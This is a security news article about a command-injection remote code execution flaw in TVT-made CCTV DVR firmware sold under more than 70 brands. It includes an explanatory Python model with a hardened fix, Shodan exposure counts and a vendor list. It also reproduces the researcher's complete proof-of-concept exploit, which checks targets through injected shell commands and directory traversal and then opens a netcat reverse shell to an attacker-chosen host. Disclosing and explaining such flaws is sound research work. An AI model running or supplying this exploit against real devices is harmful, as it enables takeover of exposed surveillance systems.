Hacking surveillance cameras from more than 70 vendors is this easy
Security researcher Rotem Kerner recently found that surveillance cameras (CCTV DVRs) sold by more than 70 vendors are vulnerable to Remote Code Execution (RCE).
According to Kerner's study, the products sold by all of these vendors run the same firmware, and that firmware carries the RCE flaw.
In the "white label" business model, many vendors simply put their own brand on the same product; unfortunately, none of them is in a position to develop the software or hardware themselves, so they all inherit the same bug.
The vulnerable firmware was developed by TVT, a Chinese manufacturer. Kerner analyzed why the DVR boxes used in closed-circuit television systems are so easy to attack.
He bought the device from an Israeli company that sells CCTV systems and extracted its firmware; the vulnerable component is the embedded HTTP server.
The flaw lies in how that server handles requests for a language directory. If the requested folder does not exist, the server builds a shell command containing the language string taken straight from the URL, without any sanitization, and executes it. An attacker can therefore inject arbitrary commands through the URL.
Here is the researcher's explanation:
It reads the URL and checks whether it contains the following: /language/[language]/index.html.
If so, the language string between the slashes is extracted and the server checks whether that directory exists. If the directory does not exist, the following command is executed directly:
tar -zxf /mnt/mtd/WebSites/language.tar.gz [language]/* -C /nfsdir/language
This basically gives us remote command execution.
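To make the injection concrete, here is an added example in Python (my own code, neither the TVT firmware nor Kerner's proof of concept) that models the language-directory handler just described and places a hardened version beside it. It assumes a simplified server that takes whatever sits between the slashes after /language/ as the language name; the archive and destination paths are the ones quoted above, the ${IFS} payload is the one the proof of concept sends, and the set of already-unpacked language directories is constructed for the demo.

```python
"""Model of the vulnerable language-directory handler and a hardened version.

Added example: this is not the TVT firmware's code. It reproduces the logic
the researcher describes (extract the language from the URL, run tar if the
directory is missing) in Python so the command injection can be traced
offline, then shows the two changes that remove it.
"""
import re
from typing import List, Optional, Set, Tuple

# Paths quoted from the researcher's explanation of the firmware.
ARCHIVE = "/mnt/mtd/WebSites/language.tar.gz"
DEST = "/nfsdir/language"

# Assumption: the server takes whatever sits between the slashes after
# /language/ as the language name (the PoC's payload ends in "/string.js",
# so the trailing filename is evidently not checked).
LANG_PATH = re.compile(r"^/language/([^/]+)/")


def extract_language(path: str) -> Optional[str]:
    """Return the raw, unvalidated language segment of a request path."""
    m = LANG_PATH.match(path)
    return m.group(1) if m else None


def vulnerable_command(lang: str) -> str:
    """What the firmware hands to the shell: untrusted text pasted straight in."""
    return "tar -zxf %s %s/* -C %s" % (ARCHIVE, lang, DEST)


def handle_request_vulnerable(path: str, existing: Set[str]) -> Tuple[str, Optional[str]]:
    """Model of the original handler: serve the page if the directory exists,
    otherwise run the extraction command through the shell."""
    lang = extract_language(path)
    if lang is None:
        return ("404", None)
    if lang in existing:
        return ("serve", lang)
    return ("exec", vulnerable_command(lang))


def as_seen_by_shell(cmd: str) -> List[str]:
    """Approximate the shell's view of the injected command line.

    ${IFS} expands to the field-separator characters, which the shell then
    treats as word breaks, so the attacker gets spaces without sending one
    in the URL; a single space is enough to model the split. Splitting on
    && lists each command that would run in turn.
    """
    expanded = cmd.replace("${IFS}", " ")
    return [part.strip() for part in expanded.split("&&")]


# --- hardened version -------------------------------------------------------

# Allowlist: a language directory name is letters only. Shell metacharacters,
# ${IFS}, path separators and ".." are all rejected outright.
SAFE_LANG = re.compile(r"^[A-Za-z]{1,32}$")


def hardened_command(lang: str) -> List[str]:
    """Build an argv list for subprocess.run(..., shell=False).

    With no shell involved, metacharacters in lang could not be interpreted
    even if validation were missing. The "lang/*" glob is dropped because
    only the shell ever expanded it; tar extracts a directory member
    recursively (assumption: the archive holds one top-level directory per
    language).
    """
    if not SAFE_LANG.match(lang):
        raise ValueError("invalid language name: %r" % lang)
    return ["tar", "-zxf", ARCHIVE, "-C", DEST, lang]


def handle_request_hardened(path: str, existing: Set[str]) -> Tuple[str, object]:
    lang = extract_language(path)
    if lang is None:
        return ("404", None)
    if not SAFE_LANG.match(lang):
        return ("400", None)  # reject before touching the filesystem at all
    if lang in existing:
        return ("serve", lang)
    return ("exec", hardened_command(lang))


if __name__ == "__main__":
    # Constructed sample: one language already unpacked, plus the PoC's
    # vulnerability-check payload (it writes a file named "test" for readback).
    existing_dirs = {"English"}
    check_payload = "/language/Swedish${IFS}&&echo${IFS}1>test&&tar${IFS}/string.js"

    kind, cmd = handle_request_vulnerable(check_payload, existing_dirs)
    print("vulnerable handler:", kind)
    for step in as_seen_by_shell(cmd):
        print("  shell runs:", step)

    print("hardened handler:", handle_request_hardened(check_payload, existing_dirs))
    print("hardened handler:", handle_request_hardened("/language/Swedish/index.html", existing_dirs))
```

Running it shows the vulnerable handler turning the single request into three shell commands (the intended tar, then "echo 1>test", then a harmless second tar), while the hardened handler answers 400 to the same request and only ever builds an argv list for a plain letters-only name. Either change alone closes this hole; the allowlist also blocks the path-traversal variant, and the argv form protects against future bugs in the validation.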
The following is the proof-of-concept exploit for the firmware vulnerability:
#!/usr/bin/env python3
# http://www.kerneronsec.com/2016/02/remote-code-execution-in-cctv-dvrs-of.html
# Original script by Rotem Kerner (written for Python 2); reflowed from the
# extracted page and ported to Python 3 here, behaviour unchanged.
__author__ = 'Rotem Kerner'

import optparse
import socket
import sys
from re import compile
from socket import timeout
from urllib.parse import urlparse

import requests
from requests.exceptions import ConnectionError, Timeout


def raw_url_request(url):
    # Disabling URL-encode hack: requests would otherwise percent-encode the
    # ${IFS}, && and .. sequences the injection depends on, so the URL is set
    # again on the already prepared request and sent as written.
    r = requests.Request('GET')
    r.url = url
    r = r.prepare()
    r.url = url  # set url without encoding
    s = requests.Session()
    return s.send(r)


def main():
    # parse command line options and arguments
    optparser = optparse.OptionParser(usage="%s <target> [options]" % sys.argv[0])
    optparser.add_option('-c', '--check', action="store_true", dest="checkvuln", default=False,
                         help="Check if target is vulnerable")
    optparser.add_option('-e', '--exploit', action="store", type="string", dest="connback",
                         help="Fire the exploit against the given target URL")
    (options, args) = optparser.parse_args()
    try:
        target = args[0]
    except IndexError:
        optparser.print_help()
        sys.exit()
    target_url = urlparse(target)
    # validating hostname
    if not target_url.hostname:
        print("[X] supplied target '%s' is not a valid URL" % target)
        optparser.print_help()
        sys.exit()
    # A little hack to handle read timeouts, since the HTTP library doesn't give us this functionality.
    socket.setdefaulttimeout(10)
    # if the -c flag is on, check whether the target URL is vulnerable.
    if options.checkvuln is True:
        print("[!] Checking if target '%s' is vulnerable..." % target_url.netloc)
        try:
            # Write a file named "test" via the injected echo.
            raw_url_request('%s://%s/language/Swedish${IFS}&&echo${IFS}1>test&&tar${IFS}/string.js'
                            % (target_url.scheme, target_url.netloc))
            # Read the file back through directory traversal.
            response = raw_url_request('%s://%s/../../../../../../../mnt/mtd/test'
                                       % (target_url.scheme, target_url.netloc))
            # Remove it.
            raw_url_request('%s://%s/language/Swedish${IFS}&&rm${IFS}test&&tar${IFS}/string.js'
                            % (target_url.scheme, target_url.netloc))
        except (ConnectionError, Timeout, timeout) as e:
            print("[X] Unable to connect. reason: %s. exiting..." % e)
            return
        if response.text[0] != '1':
            print("[X] Expected response content first char to be '1' got %s. exiting..." % response.text)
            return
        print("[V] Target '%s' is vulnerable!" % target_url.netloc)
    # if -e is on then fire the exploit.
    if options.connback is not None:
        # Validate connect-back information.
        pattern = compile(r'(?P<host>[a-zA-Z0-9.-]+):(?P<port>[0-9]+)')
        match = pattern.search(options.connback)
        if not match:
            print("[X] given connect back '%s' should be in the format host:port" % options.connback)
            optparser.print_help()
            sys.exit()
        # fire remote code execution!
        # Three .. write "nc <host> <port>" into a file named "e"
        try:
            raw_url_request('%s://%s/language/Swedish${IFS}&&echo${IFS}nc${IFS}%s${IFS}%s${IFS}>e&&${IFS}/a'
                            % (target_url.scheme, target_url.netloc, match.group('host'), match.group('port')))
            # Two ... append "-e $SHELL" so nc spawns a shell on connect
            raw_url_request('%s://%s/language/Swedish${IFS}&&echo${IFS}"-e${IFS}$SHELL${IFS}">>e&&${IFS}/a'
                            % (target_url.scheme, target_url.netloc))
            # One. Lift off! run the assembled command line
            raw_url_request('%s://%s/language/Swedish&&$(cat${IFS}e)${IFS}&>r&&${IFS}/s'
                            % (target_url.scheme, target_url.netloc))
        except (ConnectionError, Timeout, timeout) as e:
            print("[X] Unable to connect reason: %s. exiting..." % e)
            return
        print("[V] Exploit payload sent! If nothing went wrong we should be getting a reverse shell at %s:%s"
              % (match.group('host'), match.group('port')))


if __name__ == '__main__':
    main()
Kerner noticed that tens of thousands of devices currently expose this HTTP server. He reached that conclusion after querying the Shodan search engine, and the true number is likely higher than what Shodan shows.
The researcher said: "A quick Shodan query found over 30,000 of them deployed. This is a lot, but I believe it is only a small part."
Kerner tried to report the problem to the original manufacturer, TVT, but received no response, so he decided to publish the list of vendors selling devices with the vulnerable firmware.
List:
Ademco, ATS Alarmes extends lgy and systems, Area1Protection, Avio, Black Hawk Security, Capture, China security systems, Cocktail Service, Cpsecured, cp plus, Digital Eye'z (no website), Diote Service & Consulting, DVR Kapta, ELVOX, ET Vision, Extra Eye 4 U, eyemotion, EDS, Fujitsu, full HD 1080p, Gazer, Goldeye, Goldmaster, Grizzly, HD IViewer, Hi-View, Ipcom, IPOX, IR, ISC Illinois Security Cameras, inc., JFL Alarmes, Lince, LOT, Lux, Lynx Security, Magtec, Meriva Security, Multistar, Navaio, NoVus, Optivision, PARA Vision, Provision-ISR, Q-See, Quest Ek, Retail Solution Inc, RIT Huston.com, ROD Security cameras, Satvision, Sav Technology, Skilleye, Smarteye, Superior Electrial Systems, TechShell, TechSon shortmate, TecVoz, TeleEye, Tomura, truVue, TVT, Umbrella, United Video Security System, inc, Universal IT Solutions, us it Express, U-Spy Store, Ventetian, V-Gurad Security, Vid8, Vtek, Vision Line, Visar, Vodotech.com, Vook, Watchman, Xrplus, Yansi, Zetec, ZoomX.